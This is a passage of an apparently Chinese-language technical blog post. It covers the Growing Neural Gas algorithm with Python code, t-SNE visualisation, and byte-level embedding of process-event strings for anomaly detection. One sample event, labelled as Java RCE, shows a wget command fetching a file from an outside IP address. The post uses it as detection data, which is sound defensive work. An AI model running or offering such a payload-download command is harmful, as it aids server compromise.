的節點,如此一來,
是所有節點中距離值最小、而
是第二小。 -
贏家誤差變量增長:更新贏家神經元
的局部誤差,方法是將其添加到向量
與
的平方距離(這一步本質上是讓該神經元學習到輸入數據的拓朴):
。這一流程表明,大多數贏的節點(即近鄰點中出現最大數量輸入信號的那些節點)都有最大的誤差,因此,這些區域也是通過添加新節點進行“壓縮”的主要備用區,本輪增加的誤差,會在下一輪的9(神經元生長)步驟中有可能被判定為誤差最大的節點從而在其中插入新神經元節點,從直觀上我們可以感受到這里體現的思想是:如果我們尋找到了一個拓朴結構,那么我們要逐步要"越來越緊密"的結構去收縮描繪這個拓朴,有點類似我們畫畫時描繪物體的邊緣時那種感覺 -
影響力輻射(這是局部參數權重更新的核心思想):平移贏家神經元
及其所有拓撲近鄰點(即與該贏家有連接的所有神經元),方向是輸入向量
,距離則等於部分
和整個
(即周圍的神經元根據自己和輸入向量的距離等等比例更新自己的權重向量,以此來向輸入向量靠近)
。這種情況下,最佳神經元會向信號方向少許“拉動”其近鄰點(和SOM思想類似) - 神經元連接(connection)計數:以 1 為步幅,增加從贏家
輻射出來的所有連接的年齡。 - 被激活神經元連接年齡重置:如果兩個最佳神經元
與
已連接,則將其連接的年齡設為零。否則就在它們之間創建一個連接。這一步是模擬人腦神經元之間的連接保持對最新刺激的跟蹤,如果在兩個神經元之間的刺激很久都未發生,則該連接在一定的循環之后需要被刪除,類似我們太久沒看一個知識點就會忘記一樣 - 超齡神經元連接刪除:將年齡大於
的連接移除。如果神經元中的這個結果沒有更多的發散邊緣(即孤立神經元),則亦將這些神經元移除。原連接的老化和移除,是指網絡的拓撲應最大程度地接近所謂的 狄洛尼三角剖分,即神經元的三角剖分(細分為三角形),其中,尤其是三角剖分中三角形的所有角的最小角都被最大化(避免“皮包骨型的”三角)。簡而言之,從層的最大熵、拓撲的意義上說,狄洛尼三角剖分對等於最“美”。要注意的是,要求拓撲結構不作為一個獨立單元在其中,但在用於確定新節點的插入位置時,它們始終位於某個邊緣的中間 -
神經元生長:如果當前迭代的數量是
的倍數,且尚未達到網絡的限制尺寸,則如下插入一個新的神經元
:- 確定帶有一個最大局部誤差的神經元
。從誤差最大的(即目前相關性最差的神經元)位置插入一個新神經元,是為了提高該神經網絡的潛力,這些插入的新節點可能將來會逐漸通過學習提高相關性,GNG正是在這種擴展中逐步學習input向量的拓朴的 - 於近鄰點中確定
帶有一個最大誤差的神經元
。注意不是直接從全局找top1/2最大累積錯誤節點,這樣做的本質是讓神經網絡從最大錯誤節點u出發去"生長" - 於
和
中間創建一個“居中”的節點
:

- 用
與
、
以及
之間的邊,替代
與
之間的邊。類似鏈表中插入一個新節點 - 減少神經元
與
的誤差,設置神經元
的誤差值。將原來u神經元的誤差賦值給新神經元r



- 確定帶有一個最大局部誤差的神經元
-
表示對input的拓朴學習又進了一步:利用分式
減少神經元
(所有其他神經元)的所有誤差。糾正層內所有神經元的誤差變量。旨在確保網絡“忘掉”原有的輸入向量,從而更好地回應新的輸入向量。由此,我們得到了使用生長型神經氣以適應時間依賴型神經網絡的可能性,即,輸入信號的緩慢漂移分布
- 如果未能滿足停止條件,則繼續第 2 步
下面的視頻演示了網格逐漸適應於試圖根據藍點的生長密度覆蓋其空間的新進數據
0x4: python code example
# -*- coding: utf-8 -*- import mdp import numpy as np import matplotlib.pyplot as plt np.random.seed(0) # obtain reproducible results mdp.numx_rand.seed(1266090063) N = 2000 def uniform(min_, max_, dims): """Return a random number between min_ and max_ .""" return mdp.numx_rand.random(dims) * (max_ - min_) + min_ # Return n random points vector(n dims) uniformly distributed on a circumference, and radius is radius def circumference_distr(center, radius, n): """Return n random points uniformly distributed on a circumference.""" phi = uniform(0, 2 * mdp.numx.pi, (n, 1)) # calculate radius coordinate x = radius * mdp.numx.cos(phi) + center[0] y = radius * mdp.numx.sin(phi) + center[1] # return a n dimension x/y pointer vector return mdp.numx.concatenate((x, y), axis=1) def circle_distr(center, radius, n): """Return n random points uniformly distributed on a circle.""" phi = uniform(0, 2 * mdp.numx.pi, (n, 1)) sqrt_r = mdp.numx.sqrt(uniform(0, radius * radius, (n, 1))) x = sqrt_r * mdp.numx.cos(phi) + center[0] y = sqrt_r * mdp.numx.sin(phi) + center[1] return mdp.numx.concatenate((x, y), axis=1) def rectangle_distr(center, w, h, n): """Return n random points uniformly distributed on a rectangle.""" x = uniform(-w / 2., w / 2., (n, 1)) + center[0] y = uniform(-h / 2., h / 2., (n, 1)) + center[1] return mdp.numx.concatenate((x, y), axis=1) ''' functions to generate uniform probability distributions on different geometrical objects ''' # generate new random topology cf1 = circumference_distr([6, -0.5], 2, N) cf2 = circumference_distr([3, -2], 0.3, N) # generate new random topology cl1 = circle_distr([-5, 3], 0.5, N / 2) cl2 = circle_distr([3.5, 2.5], 0.7, N) # generate new random topology r1 = rectangle_distr([-1.5, 0], 1, 4, N) r2 = rectangle_distr([+1.5, 0], 1, 4, N) r3 = rectangle_distr([0, +1.5], 2, 1, N / 2) r4 = rectangle_distr([0, -1.5], 2, 1, N / 2) ''' 模擬真實場景下的數據,訓練樣本中的拓朴結構是相互混雜在一起的 ''' # Shuffle the points to make the statistics stationary x = mdp.numx.concatenate([cf1, cf2, cl1, cl2, r1, r2, r3, r4], axis=0) x = mdp.numx.take(x, mdp.numx_rand.permutation(x.shape[0]), axis=0)\ # show input train data axis_x, axis_y = [], [] for axis_i in x: axis_x.append(axis_i[0]) axis_y.append(axis_i[1]) plt.plot(axis_x, axis_y, 'ro') plt.axis([min(axis_x), max(axis_x), min(axis_y), max(axis_y)]) plt.show() # set the GNG stop condition(when grow at 75 node, stop it) gng = mdp.nodes.GrowingNeuralGasNode(max_nodes=75) print x.shape[0] STEP = 500 for i in range(0, x.shape[0], STEP): gng.train(x[i:i + STEP]) # [...] plotting instructions gng.stop_training() # show GNG Clustering result, means how many cluster it has been get n_obj = len(gng.graph.connected_components()) print n_obj
輸入的訓練樣本集可視化結果如下圖

注意到一個地方
STEP = 500 for i in range(0, x.shape[0], STEP): gng.train(x[i:i + STEP]) # [...] plotting instructions gng.stop_training()
對於GNG這種局部特征權重更新的無監督學習算法來說,它具備跟隨着輸入input數據集的變化而動態地增加網絡中的神經元,這里模擬了這個過程,每次給GNG一個500size的小數據集,讓GNG根據這個小數據集學習其拓朴結構
Relevant Link:
https://github.com/kudkudak/Growing-Neural-Gas https://cn.mathworks.com/matlabcentral/fileexchange/43665-unsupervised-learning-with-growing-neural-gas--gng--neural-network? http://demogng.de/js/demogng.html?model=NG&showAutoRestart https://en.wikipedia.org/wiki/Hebbian_theory https://www.mql5.com/zh/articles/163 http://mdp-toolkit.sourceforge.net/code/examples/gng/gng.html https://link.springer.com/chapter/10.1007/978-3-540-76725-1_71 https://books.google.com.hk/books?id=jU_7AAAAQBAJ&pg=PA85&lpg=PA85&dq=visualization+GrowingNeuralGas++training&source=bl&ots=zLGFbcubr8&sig=DJZClhiau3QhOGH2-oRwDd1GjDs&hl=zh-CN&sa=X&ved=0ahUKEwiYpvmYku_UAhVBMz4KHTvfDAEQ6AEIVzAH#v=onepage&q=visualization%20GrowingNeuralGas%20%20training&f=false https://worldwidescience.org/topicpages/d/dynamically+growing+neural.html https://papers.nips.cc/paper/893-a-growing-neural-gas-network-learns-topologies.pdf http://tieba.baidu.com/p/2871986064?see_lz=1
8. Simple implementation of the "growing neural gas" artificial neural network
我們使用上一章節生成的數據點集來輸入GNG,觀察網絡的自學習情況以及累積錯誤情況
# coding: utf-8 from sklearn import datasets from sklearn.preprocessing import StandardScaler from gng import GrowingNeuralGas import os import shutil import mdp import numpy as np np.random.seed(0) # obtain reproducible results mdp.numx_rand.seed(1266090063) # dim = N = 2000 N = 2000 def uniform(min_, max_, dims): """Return a random number between min_ and max_ .""" return mdp.numx_rand.random(dims) * (max_ - min_) + min_ # Return n random points vector(n dims) uniformly distributed on a circumference, and radius is radius def circumference_distr(center, radius, n): """Return n random points uniformly distributed on a circumference.""" phi = uniform(0, 2 * mdp.numx.pi, (n, 1)) # calculate radius coordinate x = radius * mdp.numx.cos(phi) + center[0] y = radius * mdp.numx.sin(phi) + center[1] # return a n dimension x/y pointer vector return mdp.numx.concatenate((x, y), axis=1) def circle_distr(center, radius, n): """Return n random points uniformly distributed on a circle.""" phi = uniform(0, 2 * mdp.numx.pi, (n, 1)) sqrt_r = mdp.numx.sqrt(uniform(0, radius * radius, (n, 1))) x = sqrt_r * mdp.numx.cos(phi) + center[0] y = sqrt_r * mdp.numx.sin(phi) + center[1] return mdp.numx.concatenate((x, y), axis=1) def rectangle_distr(center, w, h, n): """Return n random points uniformly distributed on a rectangle.""" x = uniform(-w / 2., w / 2., (n, 1)) + center[0] y = uniform(-h / 2., h / 2., (n, 1)) + center[1] return mdp.numx.concatenate((x, y), axis=1) if __name__ == '__main__': if os.path.exists('visualization/sequence'): shutil.rmtree('visualization/sequence') os.makedirs('visualization/sequence') # generate new random topology cf1 = circumference_distr([6, -0.5], 2, N) cf2 = circumference_distr([3, -2], 0.3, N) # generate new random topology cl1 = circle_distr([-5, 3], 0.5, N / 2) cl2 = circle_distr([3.5, 2.5], 0.7, N) # generate new random topology r1 = rectangle_distr([-1.5, 0], 1, 4, N) r2 = rectangle_distr([+1.5, 0], 1, 4, N) r3 = rectangle_distr([0, +1.5], 2, 1, N / 2) r4 = rectangle_distr([0, -1.5], 2, 1, N / 2) # Shuffle the points to make the statistics stationary data = mdp.numx.concatenate([cf1, cf2, cl1, cl2, r1, r2, r3, r4], axis=0) data = mdp.numx.take(data, mdp.numx_rand.permutation(data.shape[0]), axis=0) ''' n_samples = 2000 dataset_type = 'moons' data = None print('Preparing data...') if dataset_type == 'blobs': data = datasets.make_blobs(n_samples=n_samples, random_state=8) elif dataset_type == 'moons': data = datasets.make_moons(n_samples=n_samples, noise=.05) elif dataset_type == 'circles': data = datasets.make_circles(n_samples=n_samples, factor=.5, noise=.05) data = StandardScaler().fit_transform(data[0]) ''' print('Done.') print('Fitting neural network...') print data gng = GrowingNeuralGas(data) gng.fit_network(e_b=0.1, e_n=0.006, a_max=10, l=200, a=0.5, d=0.995, passes=8, plot_evolution=True) print('Found %d clusters.' % gng.number_of_clusters()) gng.plot_clusters(gng.cluster_data())
gng.py
# coding: utf-8 import numpy as np from scipy import spatial import networkx as nx import matplotlib.pyplot as plt from sklearn import decomposition ''' Simple implementation of the Growing Neural Gas algorithm, based on: A Growing Neural Gas Network Learns Topologies. B. Fritzke, Advances in Neural Information Processing Systems 7, 1995. ''' class GrowingNeuralGas: def __init__(self, input_data): self.network = None self.data = input_data self.units_created = 0 plt.style.use('ggplot') def find_nearest_units(self, observation): distance = [] for u, attributes in self.network.nodes(data=True): vector = attributes['vector'] dist = spatial.distance.euclidean(vector, observation) distance.append((u, dist)) distance.sort(key=lambda x: x[1]) ranking = [u for u, dist in distance] return ranking def prune_connections(self, a_max): for u, v, attributes in self.network.edges(data=True): if attributes['age'] > a_max: self.network.remove_edge(u, v) for u in self.network.nodes(): # degree = 0 means no node is connected if self.network.degree(u) == 0: self.network.remove_node(u) def fit_network(self, e_b, e_n, a_max, l, a, d, passes=1, plot_evolution=False): # logging variables accumulated_local_error = [] global_error = [] network_order = [] network_size = [] total_units = [] self.units_created = 0 # 0. start with two units a and b at random position w_a and w_b, in input data area w_a = [np.random.uniform(-2, 2) for _ in range(np.shape(self.data)[1])] w_b = [np.random.uniform(-2, 2) for _ in range(np.shape(self.data)[1])] self.network = nx.Graph() self.network.add_node(self.units_created, vector=w_a, error=0) self.units_created += 1 self.network.add_node(self.units_created, vector=w_b, error=0) self.units_created += 1 # 1. iterate through the data sequence = 0 for p in range(passes): print(' Pass #%d' % (p + 1)) np.random.shuffle(self.data) steps = 0 for observation in self.data: # 2. find the nearest unit s_1 and the second nearest unit s_2 nearest_units = self.find_nearest_units(observation) s_1 = nearest_units[0] s_2 = nearest_units[1] # 3. increment the age of all edges emanating from s_1 for u, v, attributes in self.network.edges_iter(data=True, nbunch=[s_1]): self.network.add_edge(u, v, age=attributes['age']+1) # 4. add the squared distance between the observation and the nearest unit in input space self.network.node[s_1]['error'] += spatial.distance.euclidean(observation, self.network.node[s_1]['vector'])**2 # 5 .move s_1 and its direct topological neighbors towards the observation by the fractions # e_b(for s_1) and e_n(for others), respectively, of the total distance update_w_s_1 = e_b * (np.subtract(observation, self.network.node[s_1]['vector'])) self.network.node[s_1]['vector'] = np.add(self.network.node[s_1]['vector'], update_w_s_1) update_w_s_n = e_n * (np.subtract(observation, self.network.node[s_1]['vector'])) for neighbor in self.network.neighbors(s_1): self.network.node[neighbor]['vector'] = np.add(self.network.node[neighbor]['vector'], update_w_s_n) # 6. if s_1 and s_2 are connected by an edge, set the age of this edge to zero # if such an edge doesn't exist, create it self.network.add_edge(s_1, s_2, age=0) # 7. remove edges with an age larger than a_max # if this results in units having no emanating edges, remove them as well self.prune_connections(a_max) # 8. if the number of steps so far is an integer multiple of parameter l, insert a new unit steps += 1 if steps % l == 0: if plot_evolution: self.plot_network('visualization/sequence/' + str(sequence) + '.png') sequence += 1 # 8.a determine the unit q with the maximum accumulated error # 這一步需要在累積錯誤最大的2個節點間插入新神經元節點 q = 0 error_max = 0 for u in self.network.nodes_iter(): if self.network.node[u]['error'] > error_max: error_max = self.network.node[u]['error'] q = u # 8.b insert a new unit r halfway between q and its neighbor f with the largest error variable f = -1 largest_error = -1 for u in self.network.neighbors(q): # 在最大累積錯誤節點q的拓朴中尋找另一個最大的累積錯誤節點(注意不是直接從全局找top1/2最大累積錯誤節點) if self.network.node[u]['error'] > largest_error: largest_error = self.network.node[u]['error'] f = u w_r = 0.5 * (np.add(self.network.node[q]['vector'], self.network.node[f]['vector'])) r = self.units_created self.units_created += 1 # 8.c insert edges connecting the new unit r with q and f # remove the original edge between q and f self.network.add_node(r, vector=w_r, error=0) self.network.add_edge(r, q, age=0) self.network.add_edge(r, f, age=0) self.network.remove_edge(q, f) # 8.d decrease the error variables of q and f by multiplying them with a # initialize the error variable of r with the new value of the error variable of q self.network.node[q]['error'] *= a self.network.node[f]['error'] *= a self.network.node[r]['error'] = self.network.node[q]['error'] # 9. decrease all error variables by multiplying them with a constant d error = 0 for u in self.network.nodes_iter(): error += self.network.node[u]['error'] accumulated_local_error.append(error) network_order.append(self.network.order()) network_size.append(self.network.size()) total_units.append(self.units_created) for u in self.network.nodes_iter(): self.network.node[u]['error'] *= d if self.network.degree(nbunch=[u]) == 0: print(u) global_error.append(self.compute_global_error()) plt.clf() plt.title('Accumulated local error') plt.xlabel('iterations') plt.plot(range(len(accumulated_local_error)), accumulated_local_error) plt.savefig('visualization/accumulated_local_error.png') plt.clf() plt.title('Global error') plt.xlabel('passes') plt.plot(range(len(global_error)), global_error) plt.savefig('visualization/global_error.png') plt.clf() plt.title('Neural network properties') plt.plot(range(len(network_order)), network_order, label='Network order') plt.plot(range(len(network_size)), network_size, label='Network size') plt.legend() plt.savefig('visualization/network_properties.png') def plot_network(self, file_path): plt.clf() plt.scatter(self.data[:, 0], self.data[:, 1]) node_pos = {} for u in self.network.nodes_iter(): vector = self.network.node[u]['vector'] node_pos[u] = (vector[0], vector[1]) nx.draw(self.network, pos=node_pos) plt.draw() plt.savefig(file_path) def number_of_clusters(self): return nx.number_connected_components(self.network) def cluster_data(self): unit_to_cluster = np.zeros(self.units_created) cluster = 0 for c in nx.connected_components(self.network): for unit in c: unit_to_cluster[unit] = cluster cluster += 1 clustered_data = [] for observation in self.data: nearest_units = self.find_nearest_units(observation) s = nearest_units[0] clustered_data.append((observation, unit_to_cluster[s])) return clustered_data def reduce_dimension(self, clustered_data): transformed_clustered_data = [] svd = decomposition.PCA(n_components=2) transformed_observations = svd.fit_transform(self.data) for i in range(len(clustered_data)): transformed_clustered_data.append((transformed_observations[i], clustered_data[i][1])) return transformed_clustered_data def plot_clusters(self, clustered_data): number_of_clusters = nx.number_connected_components(self.network) plt.clf() plt.title('Cluster affectation') color = ['r', 'b', 'g', 'k', 'm', 'r', 'b', 'g', 'k', 'm'] for i in range(number_of_clusters): observations = [observation for observation, s in clustered_data if s == i] if len(observations) > 0: observations = np.array(observations) plt.scatter(observations[:, 0], observations[:, 1], color=color[i], label='cluster #'+str(i)) plt.legend() plt.savefig('visualization/clusters.png') def compute_global_error(self): global_error = 0 for observation in self.data: nearest_units = self.find_nearest_units(observation) s_1 = nearest_units[0] global_error += spatial.distance.euclidean(observation, self.network.node[s_1]['vector'])**2 return global_error
Relevant Link:
https://github.com/LittleHann/GrowingNeuralGas
9. process event emberdding spalce Visualization
在這章節,我們來嘗試將進程事件輸入空間可視化,我們進行2個嘗試,分貝觀察訓練集在高維空間上的的拓朴分布,並評估是否具備使用無監督自學習拓朴算法來進行分類
1. process event的ascii編碼化向量: 即不做任何處理,直接把進程事件的字符串ascii化,並歸一化非ascii的字符 2. 將process event映射到emberdding空間中,然后觀察空間分布
因為emberdding之后是高維空間無法可視化,我們需要tensorflow projection(投影降維),tensorflow提供了3種降維方法,這3種方法都可以將高維輸入降維到2/3維
1. PCA: Principal Component Analysis A straightforward technique for reducing dimensions is Principal Component Analysis (PCA). The Embedding Projector computes the top 10 principal components. The menu lets you project those components onto any combination of two or three. PCA is a linear projection, often effective at examining global geometry. 2. t-SNE: A popular non-linear dimensionality reduction technique is t-SNE. The Embedding Projector offers both two- and three-dimensional t-SNE views. Layout is performed client-side animating every step of the algorithm. Because t-SNE often preserves some local structure(本地拓朴結構), it is useful for exploring local neighborhoods and finding clusters(鄰域局部聚類). Although extremely useful for visualizing high-dimensional data, t-SNE plots can sometimes be mysterious or misleading. See this great article for how to use t-SNE effectively. 3. Custom: You can also construct specialized linear projections based on text searches for finding meaningful directions in space. To define a projection axis, enter two search strings or regular expressions. The program computes the centroids of the sets of points whose labels match these searches, and uses the difference vector between centroids as a projection axis.
這里我們傾向於使用t-SNE,在開始前,我們先來簡單了解下t-SNT的基本原理
0x1: t-SNE原理
t-SNE是由SNE進化而來,SNE是通過仿射(affinitie)變換將數據點映射到概率分布上,主要包括兩個步驟
1. SNE構建一個高維對象之間的概率分布,使得相似的對象有更高的概率被選擇,而不相似的對象有較低的概率被選擇 2. SNE在低維空間里在構建這些點的概率分布,使得這兩個概率分布之間盡可能的相似
需要明白的是,SNE不是聚類算法,它是純粹的降維方法,雖然降維方法也可以用於聚類(例如PCA),但是降維並不等同於聚類,因為聚類需要考慮到空間拓朴結構的保留以及數據信息失真問題,而降維是可以接受一定程度的數據關系丟失的
我們還注意到t-SNE模型是非監督的降維,他跟kmeans等不同,他不能通過訓練得到一些東西之后再用於其它數據(比如kmeans可以通過訓練得到k個點,再用於其它數據集(即根據得到的模型繼續預測),而t-SNE只能單獨的對數據做操作,也就是說他只有fit_transform,而沒有fit操作)
SNE是先將歐幾里得距離轉換為條件概率來表達點與點之間的相似度。需要注意的是KL散度具有不對稱性,在低維映射中不同的距離對應的懲罰權重是不同的,具體來說:距離較遠的兩個點來表達距離較近的兩個點會產生更大的cost(盡量去擬合輸入數據的拓朴結構,把初始時混在一起的降維分類點分離開),相反,用較近的兩個點來表達較遠的兩個點產生的cost相對較小(注意:類似於回歸容易受異常值影響,但效果相反,即如果輸入數據集中有2個點屬於同一類,但是它們距離較遠,這種情況,t-SNE不會明顯地調整自己去適應這種拓朴,因為這可能導致整個降維拓朴的變形畸形,t-SNE會盡量學習局部拓朴特征)
盡管SNE提供了很好的可視化方法,但是他很難優化,而且存在”crowding problem”(擁擠問題)
擁擠問題就是說各個簇聚集在一起,無法區分。比如有一種情況,高維度數據在降維到10維下,可以有很好的表達,但是降維到兩維后無法得到可信映射,比如降維如10維中有11個點之間兩兩等距離的,在二維下就無法得到可信的映射結果(最多3個點)
后續中,Hinton等人又提出了t-SNE的方法。與SNE不同,主要如下:
1. 使用對稱版的SNE,簡化梯度公式 2. 低維空間下,使用t分布替代高斯分布表達兩點之間的相似度
t-SNE在低維空間下使用更重長尾分布的t分布來避免crowding問題和優化問題

t-sne的有效性,也可以從上圖中看到:橫軸表示距離,縱軸表示相似度, 可以看到,對於較大相似度的點,t分布在低維空間中的距離需要稍小一點;而對於低相似度的點,t分布在低維空間中的距離需要更遠。這恰好滿足了我們的需求,即同一簇內的點(距離較近)聚合的更緊密,不同簇之間的點(距離較遠)更加疏遠
總結一下,t-SNE的梯度更新有兩大優勢
1. 對於不相似的點,用一個較小的距離會產生較大的梯度來讓這些點排斥開來 2. 這種排斥又不會無限大(梯度中分母),避免不相似的點距離太遠

在進行我們實際的進程事件向量化emberdding可視化之前,我們使用glove的glove.6B.50d.txt進行實驗(由於內存限制,取2000個詞作為輸入集),從直觀上理解t-SNE的概念
# -*- coding: utf-8 -*- import sys import codecs import numpy as np import matplotlib.pyplot as plt from sklearn.manifold import TSNE def main(): embeddings_file = "glove.6B.50d.txt" wv, vocabulary = load_embeddings(embeddings_file) print wv tsne = TSNE(n_components=2, random_state=0) np.set_printoptions(suppress=True) Y = tsne.fit_transform(wv[:2000, :]) plt.scatter(Y[:, 0], Y[:, 1]) for label, x, y in zip(vocabulary, Y[:, 0], Y[:, 1]): plt.annotate(label, xy=(x, y), xytext=(0, 0), textcoords='offset points') plt.show() def load_embeddings(file_name): with codecs.open(file_name, 'r', 'utf-8') as f_in: vocabulary, wv = zip(*[line.strip().split(' ', 1) for line in f_in]) wv = np.loadtxt(wv) return wv, vocabulary if __name__ == '__main__': main()

通過zomming可以看看到t-SNE把人名、國家、數字這些向量在降維的時候聚類到了一起



同時還可以看出,emberdding跟傾向於從詞法層面去看待"相似"這個概念,例如在數字聚類那張圖中,average和100這2個詞的向量空間距離較近,表明它們在詞義上是相近的詞
0x2: 數據准備
對於process event數據來說,我們的輸入數據不再是一個單獨的詞,而是一個字符串
【/alidata/server/java-1.7.0/jre/bin/java--->wget http://122.114.14.177:443/0233】
思考一下emberdding的常用領域,在NLP領域的做法是基於tokeniza技術進行分詞,然后去除停用詞,把每一行拆分成一個word list,然后基於word2vec將所有的詞投影到一個高維空間,例如

在這種場景下,emberdding高維投影的最小單位是詞,而詞與詞之間是包含詞法含義的。但是對於異常proc event分析這里,我們的輸入是系統的進程路徑、指令、命令行參數之類的文本,並不完全符合English的詞法規則,強行進行分詞的效果並不一定會好。這里我采取的做法是按照ascii byte的單字節維度進行拆分,把一個字符串convert成一個byte list,然后將這個byte list當成一個tokens list,輸入word2vec進行向量化訓練
這樣得到的的vocabulary是一個將proc event中所有可打印字符(不可打印字符用星號*代替)組成的vector list,每個vector都由: char: fix dimension vector組成

這個vocabulary隱含了我們輸入的訓練樣本的所有byte的空間分布信息,基於這個byte vocabulary字典,我們對輸入訓練數據進行編碼,將proc event數據向量化
【/alidata/server/java-1.7.0/jre/bin/java--->wget http://122.114.14.177:443/0233】 # list不符合語法格式,只是為了更好地說明 [ / -> [ 0.59714282, 0.37679183, -0.13539211, -0.21574022, -1.57938302, -1.30245042, 1.09084558, 0.33533755, 0.10160648, -0.94351053, -0.89119941, 0.9360534 , -0.049429 , -0.57279736, -0.71337068, 1.14892995, 0.35215536, 0.0852112 , -0.78632265, 0.81085622, -0.54747117, -0.60913062, -0.09570971, -0.71837091, -0.2764748 , -0.8151623 , 0.84955674, -0.79621959, -0.91263795, 0.34293383, 0.43339723, 0.30635354, 0.48956752, -1.39774013, -0.36642498, -0.2013521 , 0.5436489 , 0.72774071, -0.47494698, 1.23675036, 1.38604641, 1.08847427, 0.0431812 , -0.198581 , 0.31857485, 1.08838224, -0.60740733, -0.29728332, -0.615816 , 0.60823154, -1.01683962, 0.63892865, 0.61414808, -0.03426743, 1.10382259, 0.24938957, 0.78430104, 0.96887851, 0.79944056, -0.1019463 , 0.46713293, -0.43706536, -0.67273641, -0.15963455, -0.03622133, -0.44651356, 1.07551551, -0.63088369, 0.50392532, -0.09643231, 0.58205545, 1.16589665, -1.04136014, -0.96029615, -0.16790186, 1.36748314, -1.0902437 , 0.981516 , -0.7209636 , 0.41370934, -0.59447336, 0.17805393, 0.91182387, 1.95722759, -0.95928752, 0.80467302, 0.29865515, -2.24124193, -0.67857677, -0.14644423, -0.01632199, 0.46235159, 1.22244143, -0.35953546, 1.03811002, -0.33354485, 1.88231277, 0.73133749, -0.79095709, 0.44468221] a -> [-0.41443196, 0.18420711, -0.13121036, 0.81862319, -0.34593245, -0.65420032, -0.58184427, 0.41809925, 0.00556373, 0.35910133, -0.35164505, -0.00378603, 0.82029456, 0.36659929, 0.35976142, 0.54450631, 0.08224635, 1.10400426, -0.26469222, 0.26049149, 0.54612935, 0.71228462, 0.61439186, 0.78772676, -0.25354931, -0.75156778, 0.31653416, -0.03102924, 0.02468991, 0.05345058, 0.51047593, -0.2934207 , 0.91022635, 0.22595032, -1.10914123, -0.64377183, 0.32521901, 0.0080247 , 0.38606018, 0.46563849, 0.58037955, 0.12432346, 0.17022869, 0.44182771, 0.1541298 , 0.46645567, -0.09506886, -0.88337237, 0.4423233 , -0.04276608, -0.68785369, 0.65162164, 0.77287203, 0.05476238, 0.13921039, 0.29394913, -0.0168863 , -0.10819948, 0.44322544, 0.33779156, -0.19596539, -0.55141109, -0.43966341, -0.19100747, 0.04682292, -0.29034454, -0.16880336, 0.33538333, -0.08784363, 0.00695483, -0.19887839, 0.05808999, -0.67197174, -0.85905921, -0.70650107, 0.85683334, -0.23631249, 0.22308137, 0.0542624 , -0.00771852, 0.97673041, 0.88210982, -0.15178144, 0.2150249 , -0.04681296, 0.01033337, -0.2487212 , -0.46819308, 0.76578599, 0.55684632, -0.22454378, 0.22623067, 0.08395205, -0.62710893, 0.12755015, -0.49221697, 0.61037868, 1.25903904, -0.36791909, 0.03496601] ... 3 -> [ -3.70845467e-01, 3.93410563e-01, 1.60593450e+00, 5.46287537e-01, 2.65109837e-01, -1.31787658e+00, -2.13675663e-01, -5.61035089e-02, -1.01826203e+00, -1.58931267e+00, 4.14101988e-01, -1.03291249e+00, 2.00901225e-01, -1.12422717e+00, 1.27530649e-01, -2.13747287e+00, 1.42055678e+00, -5.73803127e-01, -2.12872148e-01, 4.18091603e-02, -1.33366489e+00, -4.95041192e-01, -6.93559170e-01, -6.06829599e-02, 1.09784222e+00, -5.34380198e-01, -5.68631113e-01, 8.45929921e-01, 1.29352260e+00, 4.67340618e-01, -6.36335313e-01, -9.85392511e-01, -1.22497571e+00, -4.07338351e-01, -4.20602500e-01, -1.08226681e+00, 7.43993104e-01, 1.12883520e+00, 3.43645923e-02, -5.94541319e-02, 7.66032517e-01, -1.93675250e-01, 1.82689798e+00, 1.67646158e+00, -1.59705853e+00, 2.41715424e-02, 1.81469107e+00, -1.44575167e+00, -2.93559004e-02, 3.66339445e-01, 7.67972529e-01, -8.21247458e-01, -9.42183554e-01, 1.55157781e+00, -1.47846460e+00, -6.96344137e-01, -2.64094532e-01, 1.06264758e+00, -3.67395170e-02, 1.72482407e+00, -5.05911075e-02, -2.62147963e-01, -1.09699607e+00, 1.20745230e+00, -7.97679842e-01, 6.39184788e-02, 5.30795306e-02, 7.05267251e-01, -5.43238878e-01, -1.41232789e+00, 9.44538295e-01, 9.84270215e-01, -5.90061732e-02, -8.03461019e-03, 9.54896510e-01, 6.28633201e-01, 1.47355640e+00, 3.32847685e-01, 1.25698006e+00, 3.00440729e-01, 1.68355942e-01, -1.15184975e-03, -9.03676748e-01, 1.59518972e-01, 4.66192305e-01, 4.71340299e-01, 1.43235922e+00, 3.15574020e-01, 2.08510295e-01, -7.10310936e-01, 1.32493779e-01, 5.26068032e-01, 5.99716604e-02, -4.47126776e-01, -6.82992280e-01, 8.34315181e-01, -6.40793145e-01, 1.92409777e-03, 1.03552985e+00, 8.87790501e-01] ]
這樣得到的是一個(str_len, vocabulary emberdding dimension)張量向量,我們進行reduce_sum降維
vectorlist = list(tf.reduce_sum(line_vector, 1).eval())
這樣得到的就是一個(str_len)維度的向量,值得注意的是我們進行編碼維度轉換的過程,通過對byte進行emberdding向量嵌入然后把proc event字符串按照byte維度編碼后又通過reduce_sum降維,這樣得到的emberdding vector依然保留了空間相關性
1-DOWNLOAD_SUSPICIOUS_FILE_BY_JaveRCE /alidata/server/java-1.7.0/jre/bin/java--->wget http://122.114.14.177:443/0233 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 12.1349 14.2279 5.16538 9.30907 0.888179 14.2279 11.5367 14.2279 12.1349 7.97812 0.798266 10.6592 -1.25509 0.798266 10.6592 12.1349 -10.7113 14.2279 -1.25509 14.2279 10.5875 -8.16522 7.85385 -6.67422 7.85385 -11.5012 12.1349 -10.7113 10.6592 0.798266 12.1349 -0.941776 9.30907 4.77936 12.1349 -10.7113 14.2279 -1.25509 14.2279 10.5875 10.5875 10.5875 5.20662 2.31166 10.202 0.798266 11.5367 9.20893 4.07447 11.5367 11.5367 6.14633 9.92074 12.1349 12.1349 -8.16522 -4.42483 -4.42483 7.85385 -8.16522 -8.16522 -2.93291 7.85385 -8.16522 -2.93291 7.85385 -8.16522 -6.67422 -6.67422 9.92074 -2.93291 -2.93291 2.37211 12.1349 -11.5012 -4.42483 2.37211 2.37211
還要注意一個問題,每個proc event事件字符串的長度都不同,這樣降維后得到的(str_len)維度向量就無法構成一個matrix方陣,無法進行后續的神經網絡訓練以及t-SNE降維投影處理,所以我們對向量的低緯度進行padding,之所以選擇低緯度padding,是因為對象的有效信息往往傾向於集中中高維度(例如高維的球體的體積都集中在球體的表面),對低緯度進行padding並不會影響很多分類的准確度
